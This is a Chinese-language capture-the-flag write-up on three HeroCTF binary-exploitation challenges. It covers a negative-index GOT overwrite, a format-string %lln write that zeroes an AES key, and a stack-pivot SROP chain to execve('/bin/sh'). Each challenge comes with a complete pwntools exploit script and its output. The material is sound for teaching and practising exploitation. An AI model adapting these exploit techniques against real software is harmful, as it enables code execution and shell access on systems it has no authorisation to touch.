作者丨selph
appointment_book
程序信息
程序保护信息:
➜ HeroCTF checksec appointment_book
[*] '/home/selph/ctf/HeroCTF/appointment_book'
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
这里其实已经给出提示了,没有Relocation Read-Only,没有PIE,说明可以去修改got表项,当时咋就没想到呢hhhh
程序运行信息:
***** Select an option *****
1) List appointments
2) Add an appointment
3) Exit
Your choice: 2
[+] Enter the index of this appointment (0-7): 0
[+] Enter a date and time (YYYY-MM-DD HH:MM:SS): 1111-11-11 22:22:22
[+] Converted to UNIX timestamp using local timezone: -27080300601
[+] Enter an associated message (place, people, notes...): YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
***** Select an option *****
1) List appointments
2) Add an appointment
3) Exit
Your choice: 1
[+] List of appointments:
- Appointment n°1:
- Date: 1111-11-11 22:22:22
- Message: YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
- Appointment n°2:
[NO APPOINTMENT]
- Appointment n°3:
[NO APPOINTMENT]
- Appointment n°4:
[NO APPOINTMENT]
- Appointment n°5:
[NO APPOINTMENT]
- Appointment n°6:
[NO APPOINTMENT]
- Appointment n°7:
[NO APPOINTMENT]
- Appointment n°8:
[NO APPOINTMENT]
***** Select an option *****
1) List appointments
2) Add an appointment
3) Exit
逆向分析
主程序:就是提供个菜单项,主要功能在菜单函数内
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
char *v3; // rax
int v4; // [rsp+4h] [rbp-Ch]
time_t v5; // [rsp+8h] [rbp-8h]
memset(&appointments, 0, 0x80uLL);
puts("========== Welcome to your appointment book. ==========");
v5 = time(0LL);
v3 = timestamp_to_date(v5);
printf("\n[LOCAL TIME] %s\n", v3);
fflush(stdout);
while ( 1 )
{
v4 = menu();
if ( v4 == 3 )
{
puts("\n[+] Good bye!");
fflush(stdout);
exit(1);
}
if ( v4 > 3 )
{
LABEL_10:
puts("\n[-] Unknwon choice\n");
fflush(stdout);
}
else if ( v4 == 1 )
{
list_appointments();
}
else
{
if ( v4 != 2 )
goto LABEL_10;
create_appointment();
}
}
}
list_appointments函数:这里只是展示结构体保存的内容,没有什么特别的
int list_appointments()
{
int result; // eax
char *v1; // rax
int i; // [rsp+4h] [rbp-Ch]
const char **v3; // [rsp+8h] [rbp-8h]
puts("\n[+] List of appointments: ");
result = fflush(stdout);
for ( i = 0; i <= 7; ++i )
{
v3 = (const char **)((char *)&appointments + 16 * i);
printf("- Appointment n°%d:\n", (unsigned int)(i + 1));
if ( v3[1] )
{
v1 = timestamp_to_date((time_t)*v3);
printf("\t- Date: %s\n", v1);
printf("\t- Message: %s\n", v3[1]);
}
else
{
puts("\t[NO APPOINTMENT]");
}
result = fflush(stdout);
}
return result;
}
create_appointment():这里是向结构体里填充内容,但不存在堆栈相关漏洞
这里的结构体是在IDA里手动创建的,打开结构体窗口,然后右键创建即可
unsigned __int64 create_appointment()
{
__int64 v0; // rax
int i; // [rsp+Ch] [rbp-24h] BYREF
void *tmp_data; // [rsp+10h] [rbp-20h]
char *content; // [rsp+18h] [rbp-18h]
Appointment *v5; // [rsp+20h] [rbp-10h]
unsigned __int64 v6; // [rsp+28h] [rbp-8h]
v6 = __readfsqword(0x28u);
tmp_data = malloc(0x20uLL);
content = (char *)malloc(0x40uLL); // 可以申请一堆,导致内存泄露,但没啥用
memset(tmp_data, 0, 0x20uLL);
memset(content, 0, 0x40uLL);
do
{
printf("[+] Enter the index of this appointment (0-7): ");
fflush(stdout);
__isoc99_scanf("%d", &i);
getchar();
}
while ( i > 7 ); // 【关键点!!!!!】
v5 = &appointments[i];
printf("[+] Enter a date and time (YYYY-MM-DD HH:MM:SS): ");
fflush(stdout);
fgets((char *)tmp_data, 0x1E, stdin);
v0 = date_to_timestamp((__int64)tmp_data); // 接收到一个数字
v5->time = v0; // 保存到v5第一个成员
printf("[+] Converted to UNIX timestamp using local timezone: %ld\n", v5->time);
printf("[+] Enter an associated message (place, people, notes...): ");
fflush(stdout);
fgets(content, 0x3E, stdin); // 写内容到chunk中
v5->pMessage = (__int64)content; // 只能申请chunk,不能释放,赋值一个指针
free(tmp_data);
return v6 - __readfsqword(0x28u);
}
这里的一个小细节,反而是这个题目的关键点!!!:
do
{
printf("[+] Enter the index of this appointment (0-7): ");
fflush(stdout);
__isoc99_scanf("%d", &i);
getchar();
}
while ( i > 7 );
这是中间的一段循环,意思是,如果输入的索引超过了索引上限,则要求重新输入,但是这里输入可以为负数!
程序里还有个辅助函数:
.text:0000000000401336 ; Attributes: bp-based frame
.text:0000000000401336
.text:0000000000401336 ; int debug_remote()
.text:0000000000401336 public debug_remote
.text:0000000000401336 debug_remote proc near
.text:0000000000401336 ; __unwind {
.text:0000000000401336 endbr64
.text:000000000040133A push rbp
.text:000000000040133B mov rbp, rsp
.text:000000000040133E lea rax, command ; "/bin/sh"
.text:0000000000401345 mov rdi, rax ; command
.text:0000000000401348 call _system
.text:000000000040134D nop
.text:000000000040134E pop rbp
.text:000000000040134F retn
.text:000000000040134F ; } // starts at 401336
.text:000000000040134F debug_remote endp
当这里输入为负数,则绕过了索引值合法性的检查,使用负数索引,会导致索引到数组之前的地址上面,然后对其进行编辑
这里的思路就是,通过输入一个负数索引,让数组索引到got表项上,然后修改got表项的值为该辅助函数,最后触发拿到shell
利用
查看该数组所在的地址:0x0000000004037A0
查看got表项地址:
.got.plt:0000000000403740 A0 38 40 00 00 00 00 00 off_403740 dq offset strftime ; DATA XREF: _strftime+4↑r
.got.plt:0000000000403748 A8 38 40 00 00 00 00 00 off_403748 dq offset __isoc99_scanf ; DATA XREF: ___isoc99_scanf+4↑r
.got.plt:0000000000403750 B0 38 40 00 00 00 00 00 off_403750 dq offset exit ; DATA XREF: _exit+4↑r
计算中间的距离:0x50,刚好只需要输入为索引-5即可让time字段覆盖到exit函数上,只需要计算一下时间戳的转换即可:
这里有一个点就是,不同时区计算出来的结果是不同的,要在比赛中用上,需要使用比赛所在地的时区
这里本地利用,只需要使用本地时间即可,利用脚本:
#!/bin/python3
from pwn import *
FILE_NAME = "./appointment_book"
REMOTE_HOST = ""
REMOTE_PORT = 0
elf = context.binary = ELF(FILE_NAME)
gs = '''
continue
'''
def start():
if args.REMOTE:
return remote(REMOTE_HOST,REMOTE_PORT)
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
else:
return process(elf.path)
io = start()
# =============================================================================
# ============== exploit ===================
io.sendline(b"2")
io.sendline(b"-5")
io.sendline(b"1970-02-18 22:27:02")
io.sendline(b"junk data")
io.sendline(b"3")
# =============================================================================
io.interactive()
运行结果:
➜ HeroCTF python3 appointment.py
[*] '/home/selph/ctf/HeroCTF/appointment_book'
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/usr/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process '/home/selph/ctf/HeroCTF/appointment_book': pid 19621
[*] Switching to interactive mode
========== Welcome to your appointment book. ==========
[LOCAL TIME] 2023-05-16 11:02:54
***** Select an option *****
1) List appointments
2) Add an appointment
3) Exit
Your choice: [+] Enter the index of this appointment (0-7): [+] Enter a date and time (YYYY-MM-DD HH:MM:SS): [+] Converted to UNIX timestamp using local timezone: 4199222
[+] Enter an associated message (place, people, notes...):
***** Select an option *****
1) List appointments
2) Add an appointment
3) Exit
Your choice:
[+] Good bye!
$ w
11:02:56 up 8:17, 1 user, load average: 0.01, 0.13, 0.15
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
selph tty2 tty2 六14 2days 0.01s 0.01s /usr/libexec/gnome-session-binary --session=ubuntu
impossible_v2
时间花在了,格式化字符串和AES算法上
程序信息
安全选项:无PIE,其他基本上都开了
➜ HeroCTF checksec impossible_v2
[*] '/home/selph/ctf/HeroCTF/impossible_v2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
运行:
➜ HeroCTF ./impossible_v2
I've implemented a 1-block AES ECB 128 cipher that uses a random key.
Try to give me a message such as AES_Encrypt(message, key) = 0xdeadbeefdeadbeefcafebabecafebabe.
(don't try too much, this is impossible).
Enter your message: good
Do you want to change it ? (y/n) y
Enter your message (last chance): asd
So, this is your final message: 6173640a000000000000000000000000000000000000000000000000000000000000000000000000
Well, I guess you're not this smart :)
提示的很明显,这里进行了一次AES ECB模式 128位的加密,使用的是随机的Key,要求最后加密的结果为0xdeadbeefdeadbeefcafebabecafebabe才行
逆向分析
程序流程全在main函数里,比较简单:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [rsp+3h] [rbp-3Dh]
char v5; // [rsp+3h] [rbp-3Dh]
int i; // [rsp+4h] [rbp-3Ch]
FILE *streama; // [rsp+8h] [rbp-38h]
FILE *stream; // [rsp+8h] [rbp-38h]
char input[40]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 v10; // [rsp+38h] [rbp-8h]
v10 = __readfsqword(0x28u);
puts(
"I've implemented a 1-block AES ECB 128 cipher that uses a random key.\n"
"Try to give me a message such as AES_Encrypt(message, key) = 0xdeadbeefdeadbeefcafebabecafebabe.\n"
"(don't try too much, this is impossible).\n");
fflush(stdout);
streama = fopen("/dev/urandom", "rb");
fread(key, 0x10uLL, 1uLL, streama); // key是随机数
fclose(streama);
printf("Enter your message: ");
fflush(stdout);
fgets(input, 40, stdin);
sprintf(message, input); // 格式化字符串漏洞
printf("Do you want to change it ? (y/n) ");
fflush(stdout);
v4 = getc(stdin);
getc(stdin);
if ( v4 == 'y' )
{
printf("Enter your message (last chance): ");
fflush(stdout);
fgets(input, 40, stdin);
sprintf(message, input); // 再次输入的机会
}
printf("So, this is your final message: ");
for ( i = 0; i <= 39; ++i )
printf("%02x", (unsigned __int8)message[i]);
puts("\n");
fflush(stdout);
AES_Encrypt((__int64)message, key); // AES加密
if ( !memcmp(message, expected, 0x10uLL) ) // 用户输入的加密结果和预置比对
{
puts("WHAT ?! THIS IS IMPOSSIBLE !!!");
stream = fopen("flag.txt", "r");
while ( 1 )
{
v5 = getc(stream);
if ( v5 == -1 )
break;
putchar(v5);
}
fflush(stdout);
fclose(stream);
}
else
{
puts("Well, I guess you're not this smart :)");
fflush(stdout);
}
return 0;
}
首先是生成了一个随机数,保存在全局变量key中,然后使用该key加密用户输入的信息,和预置值进行比对
这里整个流程下来,可以输入两次信息,这里错误使用sprintf的参数,导致格式化字符串漏洞
所以思路就很简单了:
1. 通过格式化字符串漏洞,修改key的值为固定值(注意,这里的key长度为16字节)
2. 通过key和加密结果进行AES解密,拿到正确的输入
利用
#!/bin/python3
from pwn import *
from Crypto.Cipher import AES
FILE_NAME = "impossible_v2"
REMOTE_HOST = "static-03.heroctf.fr"
REMOTE_PORT = 5001
elf = context.binary = ELF(FILE_NAME)
gs = '''
continue
b* 0x00401369
b* 0x00401490
'''
def start():
if args.REMOTE:
return remote(REMOTE_HOST,REMOTE_PORT)
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
else:
return process(elf.path)
io = start()
password = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
text = b"\xDE\xAD\xBE\xEF\xDE\xAD\xBE\xEF\xCA\xFE\xBA\xBE\xCA\xFE\xBA\xBE"
aes = AES.new(password,AES.MODE_ECB)
input = aes.decrypt(text)
# ============== exploit ===================
key = 0x004040c0
io.sendline(b'%09$lln%10$lln..' + pack(key)+pack(key+8))
io.sendline(b'y')
io.sendline(input)
print(input)
# =============================================================================
io.interactive()
执行结果:
➜ HeroCTF python3 impossible.py
[*] '/home/selph/ctf/HeroCTF/impossible_v2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process '/home/selph/ctf/HeroCTF/impossible_v2': pid 21746
b'M\xaadj\xa2\xb5\xe3-\x10v\xa9\xe6\xbf\xa5\xe2\xba'
[*] Switching to interactive mode
I've implemented a 1-block AES ECB 128 cipher that uses a random key.
Try to give me a message such as AES_Encrypt(message, key) = 0xdeadbeefdeadbeefcafebabecafebabe.
(don't try too much, this is impossible).
Enter your message: Do you want to change it ? (y/n) Enter your message (last chance): So, this is your final message: 4daa646aa2b5e32d1076a9e6bfa5e2ba0a0000000000000000000000000000000000000000000000
WHAT ?! THIS IS IMPOSSIBLE !!!
RopeDancer
程序信息
安全选项:全都没有,呦呵,有蹊跷
➜ HeroCTF checksec ropedancer
[*] '/home/selph/ctf/HeroCTF/ropedancer'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
运行:就只是单纯的输入一次字符串,疑似栈溢出
➜ HeroCTF ./ropedancer
Hello. So, you want to be a ROPedancer? no
Well, let me know if you change your mind.
逆向分析
IDA打开一看,只有4个函数,是不妙的感觉
_exit .text 0000000000401085 00000009 . . . . . . T .
_start .text 0000000000401016 0000006F 00000004 . . . . . . . .
check_email .text 0000000000401000 00000016 00000000 R . . . . . T .
get_motivation_letter .text 000000000040108E 0000008B 00000018 R . . . . B T .
首先是get_motivation_letter:
signed __int64 get_motivation_letter()
{
signed __int64 v0; // rax
signed __int64 v1; // rax
signed __int64 result; // rax
char v3[16]; // [rsp+0h] [rbp-10h] BYREF
v0 = sys_read(0, v3, 0x64uLL); // 栈溢出
if ( (unsigned int)check_email(v3) ) // 判断是否有@
{
__asm { syscall; LINUX - sys_write } // 输出提示信息
v1 = sys_read(0, motivation_letter, 0x1F4uLL);// 可以写入一堆东西
return sys_write(1u, "We will get back to you soon. Good bye.\n", 0x29uLL);
}
else
{
result = 1LL;
__asm { syscall; LINUX - sys_write } // write(0,string,0x31)
}
return result;
}
这里是一个栈溢出,但是能溢出的字节并不多
然后经过一个判断,就只是判断字符串里是否包括@符号,无关紧要
通过判断之后,通过syscall输出提示信息,然后再次读取输入到全局变量里,这次读取的范围很大
大概流程就是这样,其他的函数没啥看的
利用
这个题的关键是rop,问题就在于几乎没什么跳板指令可以使用:
➜ HeroCTF ROPgadget --binary ropedancer --only "pop|ret"
Gadgets information
============================================================
0x0000000000401117 : pop rbp ; ret
0x0000000000401015 : ret
Unique gadgets found: 2
➜ HeroCTF ROPgadget --binary ropedancer --only "mov|ret"
Gadgets information
============================================================
0x0000000000401015 : ret
Unique gadgets found: 1
➜ HeroCTF ROPgadget --binary ropedancer --only "syscall"
Gadgets information
============================================================
0x000000000040102f : syscall
Unique gadgets found: 1
无法控制传参寄存器rdx rdi rsi rcx的值,无法通过rop去进行syscall执行execve,因为栈和数据区不可执行,也无法写入shellcode跳转执行
但是这里存在syscall,且无PIE,看看能不能控制rax的值,如果能控制rax的值为0xf,就有可能可以进行srop
SROP的条件:存在栈溢出,rax的值可控,知道一个填充了/bin/sh字符串的地址
再次搜索,找到了两个跳板指令可以修改rax的值:
0x0000000000401013 : inc al ; ret
0x0000000000401011 : xor eax, eax ; inc al ; ret
进行srop需要向栈里填充一堆东西,当前的溢出大小肯定是不够的,那就需要进行一次栈迁移,把栈扩大
刚好这里提供了一个很大的全局变量可供控制,那就正好可以把栈迁移过去
栈迁移通过两个跳板指令即可完成:
0x0000000000401114 : mov rsp, rbp ; pop rbp ; ret
0x0000000000401117 : pop rbp ; ret
这两个指令,如果存在正常的函数返回,那基本上一定会存在的
解题脚本:
#!/bin/python3
from pwn import *
FILE_NAME = "./ropedancer"
REMOTE_HOST = "static-03.heroctf.fr"
REMOTE_PORT = 5002
elf = context.binary = ELF(FILE_NAME)
libc = elf.libc
gs = '''
continue
b* 0x00401118
'''
def start():
if args.REMOTE:
return remote(REMOTE_HOST,REMOTE_PORT)
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
else:
return process(elf.path)
# =======================================
io = start()
# =============================================================================
# ============== exploit ===================
new_stack = 0x00000000040312C+8
# stack povit
inp = b"@"*0x17
rop = b""
mov_rsp_rbp = 0x0000000000401114 # mov rsp, rbp ; pop rbp ; ret
pop_rbp = 0x0000000000401117 # pop rbp ; ret
rop += pack(pop_rbp) + pack(new_stack)
rop += pack(mov_rsp_rbp)
io.sendline(b'yes\n')
io.sendline(inp+rop)
# srop
xor_eax_inc = 0x0000000000401011 # xor eax, eax ; inc al ; ret
inc_eax = 0x0000000000401013 # inc al ; ret
syscall = 0x000000000040102f # syscall
str_addr = new_stack-8
frame = SigreturnFrame()
frame.rip = syscall
frame.rax = 0x3b
frame.rdi = str_addr
frame.rsi = 0
frame.rdx = 0
# set rax = 9
rop2 = b"/bin/sh\x00"
rop2 += pack(new_stack + 400)
rop2 += pack(xor_eax_inc)
rop2 += pack(inc_eax)*0xe
# trigger srop
rop2 += pack(syscall)
rop2 += bytes(frame)
io.sendline(rop2)
# =============================================================================
io.interactive()
运行:
➜ HeroCTF python3 ropedancer.py
[*] '/home/selph/ctf/HeroCTF/ropedancer'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[+] Starting local process '/home/selph/ctf/HeroCTF/ropedancer': pid 22172
[*] Switching to interactive mode
Hello. So, you want to be a ROPedancer? \x00lright. Please enter an email on which we can contact you: \x00hanks. You have 400 characters to convince me to hire you: \x00e will get back to you soon. Good bye.
\x00$ w
14:52:34 up 10:40, 1 user, load average: 0.81, 0.54, 0.41
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
selph tty2 tty2 Sat14 3days 0.01s 0.01s /usr/libexec/gnome-session-binary --session=ubuntu
